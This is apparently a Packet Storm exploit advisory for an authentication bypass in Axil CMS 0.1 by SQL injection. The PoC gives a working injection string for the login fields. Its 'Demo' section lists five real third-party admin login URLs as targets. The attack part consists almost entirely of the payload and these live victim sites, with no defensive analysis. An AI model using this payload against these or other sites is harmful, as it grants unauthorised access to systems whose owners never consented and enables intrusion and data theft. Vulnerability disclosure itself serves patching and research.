Axil CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for login bypass.
a72259e5a0cc0fc7e03db97358db172b5f910222cde66c42f2396e56eb331e76######################
# Exploit Title : Axil CMS 0.1 Authentication bypass
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.axilcreations.com/
# Date: 2016/03/31
# Version : 0.1
######################
# PoC:
# User And Pass : '=' 'or'
# Demo :
# http://www.mets.com.np/myadmin/
# http://www.princeies.com/myadmin/
# http://www.perfectdestination.com.np/myadmin/
# http://www.edb.com.np/myadmin/
# http://ambrosiaib.com/myadmin/
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : Milad_Hacking & FireKernel And You
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed